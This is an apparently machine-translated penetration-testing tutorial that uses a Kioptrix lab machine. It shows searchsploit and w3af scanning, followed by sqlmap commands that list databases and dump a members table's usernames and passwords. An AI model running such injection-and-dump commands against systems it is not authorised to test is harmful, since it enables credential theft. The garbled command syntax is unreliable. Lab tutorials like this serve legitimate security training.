Vulnerability exploitation in penetration testing

Vulnerability exploitation in penetration testing
1. Search for vulnerabilities in the target system

In the previous article on penetration testing, this article describes how to collect information about the target system. Next, we will take any Kioptrix as an example to describe how to exploit the vulnerability.
On exploit-db.com websites, it is generally possible to find valuable information about known vulnerabilities and proof-of-concept code (POC) that verifies their effectiveness ). The concept Verification Code helps you understand the principles and mechanisms of this vulnerability, so that you can determine whether the protection measures work properly.

2. Offline vulnerability Library

In Kali Linux, a vulnerability library is automatically included in/usr/share/exploitdb. Use the searchsploit command to search for a vulnerability.
# Searchploit samba

　　

This is a list of various vulnerabilities of the samba server version. For details, we have not found any vulnerabilities related to 3.0.28a in the target system samba server (listed in the last scan in the previous chapter, in this case, you can search for the vulnerability on the Internet or update the local vulnerability library, which is not described here. 3. Use the w3af Tool

W3af is an artifact used by web vulnerability scanning. The following describes how to use it. Enter w3af_gui In the Kali Linux terminal to start its graphical interface version.

　　

Select "full_audit" in scan config, select the bruteforce plug-in, enter the Target URL in the Target address bar, and click "Start" to Start scanning.

　　

You can view the scanned logs in the log tab.

　　

In the Result tab, you can view the scan results. In the results, you can see some red-marked vulnerabilities, including sqli (SQL injection) and click_hajacking vulnerabilities. These are all usable vulnerabilities.

4. Use sqlmap for SQL Injection

1) Use the sqlmap command to dump the database information required for intrusion.
# Sqlmap-u 192.168.50.102/checklogin. php -- data mypassword = 1

** Note: ** the logon service provided by 192.168.50.102 is POST. Use the-data option followed by the content to be sent.

　　

Use the following command to list all databases.
'Sqlmap-u http: // 192.168.50.102/checklogin. php -- data mypassword = 1 -- dbs

　　

View the content of the members database:
Sqlmap-u http: // 192.168.50.102/checklogin. php -- data mypassword = 1-D members -- tables

　　

Name of the column listing the table:
Sqlmap-u http: // 192.168.50.102/checklogin. php -- data mypassword = 1-D members-T members -- columns

 

List table content:
# Sqlmap-u http: // 192.168.50.102/checklogin. php -- data mypassword = 1-D members-T members-C username, password -- dump